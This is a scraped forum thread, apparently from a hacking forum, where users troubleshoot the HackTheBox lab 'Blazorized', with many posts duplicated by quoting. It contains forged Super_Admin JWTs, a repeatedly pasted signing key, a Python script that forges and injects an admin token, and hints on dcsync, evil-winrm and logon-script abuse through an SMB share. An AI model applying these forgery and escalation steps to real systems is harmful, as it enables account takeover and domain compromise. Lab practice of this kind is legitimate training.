[ritualist]

What's next from SSA_6010?

c:\Users\SSA_6010>whoami
whoami
blazorized\ssa_6010

dcsync -> evil-winrm

[BahsbFAISfjhb]

Having trouble with SSA_6010 - I have tried setting the ScriptPath for the user to \\10.10.X.X\ and hosting with smbserver, as well using C:\temp\pwn.bat, but I don't seem to get any execution. Is there a requirement for where the script needs to be?

[fgdh]

Anyone getting this error when using "setspn -Q blazorized.htb/rsa_4810" or "setspn -Q */*",

Error occurred when searching for existing SPN: 0x00000051
?

Also, do people get any feedback when running PowerView?
I did "powershell -ep bypass", then ". .\PowerView.ps1" and tried to run any powerview command but get nothing back.

Anyone getting this error when using "setspn -Q blazorized.htb/rsa_4810" or "setspn -Q */*",

Error occurred when searching for existing SPN: 0x00000051
?

Also, do people get any feedback when running PowerView?
I did "powershell -ep bypass", then ". .\PowerView.ps1" and tried to run any powerview command but get nothing back.

I was having this issue. Fixed by using rlwrap nc -lvnp instead of just nc on its own. Then I could use ipmo powerview.ps1 and it worked fine for me.

Interesting. I tried that but I still get the same behavior, no output from PowerView and same error from setspn

[chappy]

My JWT is not working, am I doing something wrong? Capturing the get update request to get the jwt with burpsuite, changing the payload to "Super_Admin", changing the exp to be valid for lots of time, and changin the aud to admin.blazorized.htb, signing with the private key, copying the jwt and adding to local storage with the key jwt and value the jwtformat, when I refresh the page nothing happens

Can you put your jwt , i will checking in my  burp

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | https://breachforums.rs/Forum-Ban-Appeals if you feel this is incorrect.

[BahsbFAISfjhb]

My JWT is not working, am I doing something wrong? Capturing the get update request to get the jwt with burpsuite, changing the payload to "Super_Admin", changing the exp to be valid for lots of time, and changin the aud to admin.blazorized.htb, signing with the private key, copying the jwt and adding to local storage with the key jwt and value the jwtformat, when I refresh the page nothing happens

Can you put your jwt , i will checking in my  burp

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NTU1MjIzNCwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.3QBAmkTuxzJy2ILyPmxavDPv0CF9Bk_ulQ15oOHWjYazqOYfuRlTzr2769PGnU3KKk6XkKP5-Wza3O6-h11YRA

Make sure you update the timestamp, take it from the original JWT in the check update request

[chappy]

null

My JWT is not working, am I doing something wrong? Capturing the get update request to get the jwt with burpsuite, changing the payload to "Super_Admin", changing the exp to be valid for lots of time, and changin the aud to admin.blazorized.htb, signing with the private key, copying the jwt and adding to local storage with the key jwt and value the jwtformat, when I refresh the page nothing happens

Can you put your jwt , i will checking in my  burp

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NTU1MjIzNCwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.3QBAmkTuxzJy2ILyPmxavDPv0CF9Bk_ulQ15oOHWjYazqOYfuRlTzr2769PGnU3KKk6XkKP5-Wza3O6-h11YRA

ldo you have this key:
8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a

---

null

My JWT is not working, am I doing something wrong? Capturing the get update request to get the jwt with burpsuite, changing the payload to "Super_Admin", changing the exp to be valid for lots of time, and changin the aud to admin.blazorized.htb, signing with the private key, copying the jwt and adding to local storage with the key jwt and value the jwtformat, when I refresh the page nothing happens

Can you put your jwt , i will checking in my  burp

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NTU1MjIzNCwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.3QBAmkTuxzJy2ILyPmxavDPv0CF9Bk_ulQ15oOHWjYazqOYfuRlTzr2769PGnU3KKk6XkKP5-Wza3O6-h11YRA

ldo you have this key:
8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a

take this <-- verified signature ok
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mjk3MjcxODQsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYWRtaW4uYmxhem9yaXplZC5odGIifQ.lH7VjUlljyWIRVVY6k2V3XONVLRyjgzb6mXIxX6ktkJMAHL9HpcYfRWu8tAuwA3-2VXNQ6CUGUriyB21tuYu8Q

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | https://breachforums.rs/Forum-Ban-Appeals if you feel this is incorrect.

[chappy]

Feeling stupid now... When I pasted the secret key it didn't erased the "put your 256 bit secret here" from the site and i didn't see it, lol, thanks a lot!

these are things that happen
the jwt you gave is not good too

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | https://breachforums.rs/Forum-Ban-Appeals if you feel this is incorrect.

[f3bru]

Hey, can some1 help me a bit?

for the JWT token:

{
  "alg": "HS512",
  "typ": "JWT"
}

{
  "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
  "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
    "Super_Admin"
  ],
  "exp": 1719766212,
  "iss": "http://api.blazorized.htb",
  "aud": "http://admin.blazorized.htb"
}

and the symmetric security key (found in .helper):
8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a


JTW token:
eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NjU0MiwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.Jn0jrd0UAL0b5StsK9fWBxBmZmZbrCZwo285akl6ItlgpgzuaQuTLszwpY2KPnAfUeymk3L3lrX_L-WmvcIWDA


When im inserting it to local storage: key: 'jwt' nothing happens.

I even tried with tampermonkey and console itself.

[chappy]

Hey, can some1 help me a bit?

for the JWT token:

{
  "alg": "HS512",
  "typ": "JWT"
}

{
  "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
  "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
    "Super_Admin"
  ],
  "exp": 1719766212,
  "iss": "http://api.blazorized.htb",
  "aud": "http://admin.blazorized.htb"
}

and the symmetric security key (found in .helper):
8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a


JTW token:
eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NjU0MiwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.Jn0jrd0UAL0b5StsK9fWBxBmZmZbrCZwo285akl6ItlgpgzuaQuTLszwpY2KPnAfUeymk3L3lrX_L-WmvcIWDA


When im inserting it to local storage: key: 'jwt' nothing happens.

I even tried with tampermonkey and console itself.

change exp:  <<== the token expired
take this :
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NTU1MjIzNCwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.PtMPiTLi27j6HmK-uMmFC3MExIyrFrxmD7jxxKJVT0Igjwa3QgtRwjtQi1_Nr-sDzws0aVw5Mgy-D92KCyu56Q

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | https://breachforums.rs/Forum-Ban-Appeals if you feel this is incorrect.

[f3bru]

Hey, can some1 help me a bit?

for the JWT token:

{
  "alg": "HS512",
  "typ": "JWT"
}

{
  "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
  "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
    "Super_Admin"
  ],
  "exp": 1719766212,
  "iss": "http://api.blazorized.htb",
  "aud": "http://admin.blazorized.htb"
}

and the symmetric security key (found in .helper):
8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a


JTW token:
eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NjU0MiwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.Jn0jrd0UAL0b5StsK9fWBxBmZmZbrCZwo285akl6ItlgpgzuaQuTLszwpY2KPnAfUeymk3L3lrX_L-WmvcIWDA


When im inserting it to local storage: key: 'jwt' nothing happens.

I even tried with tampermonkey and console itself.

change exp:  <<== the token expired

cat script.py           
import jwt
import datetime

# Define the payload
payload = {
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
        "Super_Admin"
    ],
    "exp": datetime.datetime.utcnow() + datetime.timedelta(seconds=600),  # Updated timestamp for expiration
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb"
}

# Define the symmetric key
jwt_symmetric_security_key = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a"

# Encode the JWT token
jwt_token = jwt.encode(payload, jwt_symmetric_security_key, algorithm='HS512')

# Print the JWT token (optional)
print(f"Generated JWT token: {jwt_token}")

# JavaScript snippet to set JWT token in local storage
js_code = f"""
localStorage.setItem('jwt', '{jwt_token}');
console.log('JWT token set in local storage');
"""

# Print the JavaScript code
print("JavaScript to set JWT in local storage:")
print(js_code)
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/htb/blazorized]
└─$ python3 script.py
Generated JWT token: eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NzU3OCwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.w_Nu0_GAXC_Vv-6WXNU5BrmE3XyzFydpuh1Hq0YO_l36hDDe7SXU8a8d30is_O8oPABu8WuUir6g-uAjolvy1A
JavaScript to set JWT in local storage:

localStorage.setItem('jwt', 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIl0sImV4cCI6MTcxOTc2NzU3OCwiaXNzIjoiaHR0cDovL2FwaS5ibGF6b3JpemVkLmh0YiIsImF1ZCI6Imh0dHA6Ly9hZG1pbi5ibGF6b3JpemVkLmh0YiJ9.w_Nu0_GAXC_Vv-6WXNU5BrmE3XyzFydpuh1Hq0YO_l36hDDe7SXU8a8d30is_O8oPABu8WuUir6g-uAjolvy1A');
console.log('JWT token set in local storage');

Thats the script i wrote. I just changed the exp to seconds=600 from 60. Im not trying with the same JWT token everytime.